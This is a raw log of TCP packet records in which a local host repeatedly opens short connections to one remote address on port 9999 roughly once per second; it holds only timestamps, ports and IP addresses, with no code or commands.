Oct 8, 2024 04:22:01.143603086 CEST	9999	54392	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:02.025183916 CEST	9999	54392	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:02.025269032 CEST	54392	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:02.025336027 CEST	9999	54392	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:02.025388956 CEST	54392	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:02.096915007 CEST	54392	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:02.101913929 CEST	9999	54392	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:02.202770948 CEST	54393	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:02.207861900 CEST	9999	54393	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:02.207940102 CEST	54393	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:02.208129883 CEST	54393	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:02.212927103 CEST	9999	54393	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:03.159029007 CEST	9999	54393	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:03.159075975 CEST	9999	54393	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:03.159106970 CEST	54393	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:03.159197092 CEST	54393	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:03.159271955 CEST	54393	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:03.164324045 CEST	9999	54393	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:03.275130033 CEST	54394	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:03.280083895 CEST	9999	54394	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:03.283545971 CEST	54394	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:03.283934116 CEST	54394	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:03.288747072 CEST	9999	54394	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:04.197884083 CEST	9999	54394	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:04.197930098 CEST	9999	54394	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:04.197964907 CEST	54394	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:04.198028088 CEST	54394	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:04.198088884 CEST	54394	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:04.203077078 CEST	9999	54394	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:04.313164949 CEST	54395	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:04.318336964 CEST	9999	54395	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:04.318527937 CEST	54395	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:04.318619013 CEST	54395	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:04.323502064 CEST	9999	54395	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:05.226006985 CEST	9999	54395	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:05.226061106 CEST	9999	54395	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:05.226285934 CEST	54395	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:05.227482080 CEST	54395	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:05.232755899 CEST	9999	54395	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:05.343466997 CEST	54396	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:05.348531008 CEST	9999	54396	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:05.351300001 CEST	54396	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:05.351300001 CEST	54396	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:05.356281996 CEST	9999	54396	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:06.264461040 CEST	9999	54396	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:06.264519930 CEST	9999	54396	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:06.264580965 CEST	54396	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:06.264581919 CEST	54396	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:06.264689922 CEST	54396	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:06.269598961 CEST	9999	54396	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:06.376311064 CEST	54397	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:06.381318092 CEST	9999	54397	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:06.381393909 CEST	54397	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:06.381555080 CEST	54397	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:06.386373043 CEST	9999	54397	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:07.283281088 CEST	9999	54397	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:07.283493042 CEST	9999	54397	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:07.285140038 CEST	54397	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:07.285140038 CEST	54397	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:07.290117979 CEST	9999	54397	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:07.392997980 CEST	54398	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:07.398024082 CEST	9999	54398	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:07.401176929 CEST	54398	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:07.401177883 CEST	54398	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:07.406167984 CEST	9999	54398	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:08.308556080 CEST	9999	54398	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:08.308587074 CEST	9999	54398	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:08.308620930 CEST	54398	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:08.308645964 CEST	54398	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:08.308718920 CEST	54398	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:08.313673019 CEST	9999	54398	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:08.422483921 CEST	54399	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:08.428091049 CEST	9999	54399	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:08.428284883 CEST	54399	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:08.428284883 CEST	54399	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:08.433339119 CEST	9999	54399	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:09.370199919 CEST	9999	54399	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:09.370302916 CEST	9999	54399	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:09.370549917 CEST	54399	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:09.370549917 CEST	54399	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:09.375502110 CEST	9999	54399	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:09.487552881 CEST	54400	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:09.493266106 CEST	9999	54400	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:09.493439913 CEST	54400	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:09.493809938 CEST	54400	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:09.498929024 CEST	9999	54400	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:10.599735975 CEST	9999	54400	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:10.599780083 CEST	9999	54400	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:10.599812984 CEST	9999	54400	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:10.599978924 CEST	54400	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:10.599978924 CEST	54400	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:10.599978924 CEST	54400	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:10.600084066 CEST	54400	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:10.607151031 CEST	9999	54400	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:10.703162909 CEST	54401	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:10.708265066 CEST	9999	54401	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:10.708337069 CEST	54401	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:10.708503008 CEST	54401	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:10.713536978 CEST	9999	54401	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:11.622876883 CEST	9999	54401	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:11.622932911 CEST	9999	54401	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:11.622958899 CEST	54401	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:11.623003006 CEST	54401	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:11.623303890 CEST	54401	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:11.628161907 CEST	9999	54401	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:11.733335972 CEST	54402	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:11.738292933 CEST	9999	54402	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:11.739403963 CEST	54402	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:11.743417025 CEST	54402	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:11.748344898 CEST	9999	54402	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:12.633598089 CEST	9999	54402	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:12.633654118 CEST	9999	54402	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:12.633663893 CEST	54402	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:12.633692980 CEST	54402	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:12.633769035 CEST	54402	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:12.639343977 CEST	9999	54402	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:12.749941111 CEST	54403	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:12.754889965 CEST	9999	54403	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:12.754952908 CEST	54403	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:12.755117893 CEST	54403	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:12.759896040 CEST	9999	54403	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:13.665754080 CEST	9999	54403	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:13.665813923 CEST	9999	54403	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:13.665926933 CEST	54403	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:13.666049004 CEST	54403	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:13.670979977 CEST	9999	54403	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:13.781074047 CEST	54404	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:13.786206007 CEST	9999	54404	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:13.787226915 CEST	54404	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:13.787391901 CEST	54404	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:13.792308092 CEST	9999	54404	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:14.686839104 CEST	9999	54404	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:14.687002897 CEST	9999	54404	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:14.687035084 CEST	54404	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:14.687130928 CEST	54404	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:14.797199011 CEST	54404	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:14.797379017 CEST	54405	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:14.802380085 CEST	9999	54404	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:14.802416086 CEST	9999	54405	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:14.802474022 CEST	54405	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:14.802586079 CEST	54405	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:14.807405949 CEST	9999	54405	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:15.706558943 CEST	9999	54405	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:15.706609964 CEST	9999	54405	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:15.709139109 CEST	54405	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:15.709139109 CEST	54405	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:15.714164019 CEST	9999	54405	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:15.813009024 CEST	54406	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:15.818017960 CEST	9999	54406	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:15.819205999 CEST	54406	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:15.819205999 CEST	54406	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:15.824112892 CEST	9999	54406	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:16.722466946 CEST	9999	54406	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:16.722522020 CEST	54406	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:16.722563982 CEST	9999	54406	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:16.722606897 CEST	54406	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:16.827841997 CEST	54406	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:16.828305006 CEST	54407	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:16.833370924 CEST	9999	54406	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:16.833493948 CEST	9999	54407	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:16.833566904 CEST	54407	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:16.833700895 CEST	54407	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:16.838551998 CEST	9999	54407	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:17.757220984 CEST	9999	54407	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:17.757266045 CEST	9999	54407	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:17.759515047 CEST	54407	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:17.759515047 CEST	54407	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:17.766444921 CEST	9999	54407	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:17.875169039 CEST	54408	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:17.882229090 CEST	9999	54408	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:17.883604050 CEST	54408	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:17.883604050 CEST	54408	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:17.889578104 CEST	9999	54408	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:18.771646023 CEST	9999	54408	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:18.771694899 CEST	9999	54408	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:18.771722078 CEST	54408	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:18.771754980 CEST	54408	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:18.771900892 CEST	54408	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:18.776710987 CEST	9999	54408	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:18.875477076 CEST	54409	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:18.880846977 CEST	9999	54409	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:18.880934000 CEST	54409	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:18.881102085 CEST	54409	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:18.885955095 CEST	9999	54409	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:19.809639931 CEST	9999	54409	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:19.809717894 CEST	9999	54409	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:19.811671972 CEST	54409	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:19.815176010 CEST	54409	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:19.820090055 CEST	9999	54409	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:19.921097994 CEST	54410	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:19.925893068 CEST	9999	54410	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:19.929317951 CEST	54410	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:19.929317951 CEST	54410	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:19.934192896 CEST	9999	54410	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:20.818056107 CEST	9999	54410	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:20.818260908 CEST	9999	54410	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:20.818384886 CEST	54410	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:20.851407051 CEST	54410	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:20.856367111 CEST	9999	54410	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:20.988190889 CEST	54411	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:20.993138075 CEST	9999	54411	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:20.993216038 CEST	54411	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:20.993362904 CEST	54411	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:20.998611927 CEST	9999	54411	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:21.899410009 CEST	9999	54411	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:21.899491072 CEST	9999	54411	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:21.899635077 CEST	54411	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:21.901228905 CEST	54411	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:21.907032013 CEST	9999	54411	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:22.016186953 CEST	54412	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:22.021209002 CEST	9999	54412	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:22.021294117 CEST	54412	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:22.021445036 CEST	54412	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:22.026210070 CEST	9999	54412	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:22.933939934 CEST	9999	54412	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:22.933986902 CEST	9999	54412	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:22.934010983 CEST	54412	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:22.934070110 CEST	54412	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:22.934165001 CEST	54412	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:22.939002991 CEST	9999	54412	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:23.046471119 CEST	54413	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:23.051337957 CEST	9999	54413	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:23.053302050 CEST	54413	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:23.053302050 CEST	54413	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:23.058165073 CEST	9999	54413	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:23.954143047 CEST	9999	54413	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:23.954197884 CEST	9999	54413	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:23.956008911 CEST	54413	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:23.956120014 CEST	54413	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:23.960922003 CEST	9999	54413	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:24.062961102 CEST	54414	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:24.068015099 CEST	9999	54414	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:24.068093061 CEST	54414	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:24.068232059 CEST	54414	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:24.073056936 CEST	9999	54414	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:25.011725903 CEST	9999	54414	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:25.011785030 CEST	9999	54414	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:25.011811018 CEST	54414	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:25.011869907 CEST	54414	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:25.011893988 CEST	54414	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:25.016774893 CEST	9999	54414	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:25.125024080 CEST	54415	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:25.130100965 CEST	9999	54415	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:25.133205891 CEST	54415	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:25.133207083 CEST	54415	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:25.138142109 CEST	9999	54415	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:26.027235031 CEST	9999	54415	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:26.027286053 CEST	9999	54415	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:26.027322054 CEST	54415	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:26.027426958 CEST	54415	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:26.027447939 CEST	54415	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:26.033211946 CEST	9999	54415	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:26.140590906 CEST	54416	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:26.145519972 CEST	9999	54416	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:26.145586967 CEST	54416	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:26.145747900 CEST	54416	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:26.150568962 CEST	9999	54416	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:27.061949015 CEST	9999	54416	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:27.062247992 CEST	9999	54416	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:27.065299034 CEST	54416	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:27.065299034 CEST	54416	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:27.070255995 CEST	9999	54416	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:27.173186064 CEST	54417	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:27.178313971 CEST	9999	54417	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:27.181267023 CEST	54417	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:27.181267023 CEST	54417	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:27.186188936 CEST	9999	54417	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:28.116695881 CEST	9999	54417	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:28.116770983 CEST	54417	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:28.116848946 CEST	9999	54417	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:28.116899014 CEST	54417	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:28.234167099 CEST	54417	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:28.234426022 CEST	54418	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:28.239017963 CEST	9999	54417	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:28.239243984 CEST	9999	54418	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:28.239305973 CEST	54418	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:28.239460945 CEST	54418	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:28.244263887 CEST	9999	54418	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:29.184072971 CEST	9999	54418	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:29.184129000 CEST	9999	54418	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:29.185167074 CEST	54418	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:29.185167074 CEST	54418	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:29.190109968 CEST	9999	54418	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:29.299424887 CEST	54419	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:29.304332972 CEST	9999	54419	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:29.306343079 CEST	54419	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:29.309024096 CEST	54419	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:29.313920021 CEST	9999	54419	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:30.200330019 CEST	9999	54419	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:30.200381994 CEST	54419	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:30.200397968 CEST	9999	54419	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:30.200510025 CEST	54419	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:30.200546026 CEST	54419	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:30.205300093 CEST	9999	54419	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:30.312320948 CEST	54420	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:30.317383051 CEST	9999	54420	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:30.317451954 CEST	54420	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:30.317567110 CEST	54420	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:30.322470903 CEST	9999	54420	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:31.210064888 CEST	9999	54420	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:31.210120916 CEST	9999	54420	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:31.211253881 CEST	54420	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:31.211253881 CEST	54420	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:31.216257095 CEST	9999	54420	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:31.327680111 CEST	54421	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:31.332921028 CEST	9999	54421	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:31.335273981 CEST	54421	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:31.335273981 CEST	54421	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:31.340204954 CEST	9999	54421	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:32.249612093 CEST	9999	54421	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:32.249639034 CEST	9999	54421	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:32.249744892 CEST	54421	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:32.266661882 CEST	54421	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:32.271495104 CEST	9999	54421	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:32.397944927 CEST	54422	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:32.402964115 CEST	9999	54422	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:32.403049946 CEST	54422	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:32.405019999 CEST	54422	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:32.409838915 CEST	9999	54422	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:33.310014009 CEST	9999	54422	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:33.310188055 CEST	9999	54422	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:33.310425997 CEST	54422	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:33.313054085 CEST	54422	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:33.317922115 CEST	9999	54422	47.239.242.141	192.168.2.4
Oct 8, 2024 04:22:33.421313047 CEST	54423	9999	192.168.2.4	47.239.242.141
Oct 8, 2024 04:22:33.426311970 CEST	9999	54423	47.239.242.141	192.168.2.4
